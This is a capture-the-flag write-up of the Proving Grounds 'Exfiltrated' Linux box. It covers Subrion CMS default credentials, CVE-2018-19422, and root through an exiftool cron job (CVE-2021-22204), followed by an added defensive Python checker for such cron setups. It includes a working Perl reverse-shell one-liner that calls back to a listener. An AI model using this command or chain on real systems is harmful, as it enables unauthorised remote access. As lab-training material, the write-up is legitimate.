Exfiltrated

Source: Proving Grounds | OS: Linux | Community Rating: Intermediate

Enumeration & Reconnaissance

  • I started off with autorecon, which revealed two open ports on the target:

    • SSH (22)

    • HTTP (80)

Service Analysis

  • After examining the HTTP service, the hostname http://exfiltrated.offsec appeared, so I updated my /etc/hosts to properly resolve it.

  • I checked robots.txt and, just like that, it revealed several hidden directories. One of them led me to an admin login page for Subrion CMS v4.2.1.

[Screenshot: robots.txt]
[Screenshot: Subrion CMS login page]

Gaining Initial Access

  • A quick web search confirmed that this version is affected by CVE-2018-19422. However, to take advantage of this vulnerability, valid credentials were necessary. I tried the default combination admin:admin, and it worked!

[Screenshot: CVE-2018-19422]

  • The shell I obtained was poor: a basic, non-interactive one. My attempts to upgrade it to a fully interactive TTY failed until I tried a Perl one-liner. Running the following command (generated with revshells.com) finally gave me a usable shell:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.217:9001");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Privilege Escalation

  • Once I had a reliable shell, I ran linpeas.sh to scout for further vulnerabilities. The scan pointed out that the target was vulnerable to CVE-2021-4034, the notorious Polkit exploit that had given me so much trouble on the previous machine. I didn't want to try this route again.

  • I checked the cron jobs and was pleased to discover one scheduled to run every minute. The cron job executed a script that ran exiftool on uploaded files and appended the extracted metadata to a log.

[Screenshot: the cron job script]

  • A bit of online research revealed that the installed exiftool was vulnerable to CVE-2021-22204. Using a GitHub PoC that generates the payload, I crafted a malicious image, moved it to the target, and waited for the cron job to pick it up. When exiftool processed my payload, I obtained root access.

[Screenshot: CVE-2021-22204 payload]
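
Defender-side check for the cron weakness above, added here and not part of the original writeup: it parses a system crontab, flags root jobs whose command (or the script it invokes) reads from a web-writable upload directory, and tests an ExifTool version string against the CVE-2021-22204 affected range (7.44 through 12.23, fixed in 12.24). The crontab, the script body and the /var/www/uploads path are constructed samples, not taken from the target.

```python
import re

# Constructed sample of a system crontab (fields: min hour dom mon dow user command).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
17 *  * * *  root      cd / && run-parts --report /etc/cron.hourly
* *   * * *  root      bash /opt/image-exif.sh
*/5 * * * *  www-data  /usr/local/bin/cleanup-tmp /var/www/uploads
"""

# Constructed body of the script the root job runs (a real audit reads it from disk).
SAMPLE_SCRIPTS = {
    "/opt/image-exif.sh": '#!/bin/bash\nfor f in /var/www/uploads/*; do '
                          'exiftool "$f" >> /var/log/exif.log; done\n',
}

# Directories the web application user can write to (assumed for this example).
WEB_WRITABLE = ["/var/www/uploads"]

def parse_system_crontab(text):
    """Return (user, command) pairs, skipping blanks, comments and VAR=value lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        fields = line.split(None, 6)  # five time fields, the user, then the command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs

def risky_root_jobs(crontab_text, scripts, writable_dirs):
    """Root jobs whose command, or a script it invokes, touches a web-writable directory."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        text = command + "".join(body for path, body in scripts.items() if path in command)
        hits = [d for d in writable_dirs if d in text]
        if hits:
            findings.append((command, hits))
    return findings

def exiftool_vulnerable(version):
    """CVE-2021-22204 affects ExifTool 7.44 through 12.23; 12.24 carries the fix."""
    major, minor = (int(x) for x in version.split(".")[:2])
    return (7, 44) <= (major, minor) < (12, 24)
```

A job that trips both checks (root, vulnerable parser, attacker-writable input) is exactly the pattern this box relies on; the fix is to patch exiftool and run the job as an unprivileged user.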

Lessons Learned

  • Hidden Directories: A simple robots.txt file can uncover critical hidden paths.

  • Default Credentials: Sometimes, the most obvious username and password (admin:admin) can be all it takes to exploit a vulnerability.

  • Cron Job Exploitation: The insecure cron job, running a vulnerable exiftool over user-uploaded files, was the path to root.
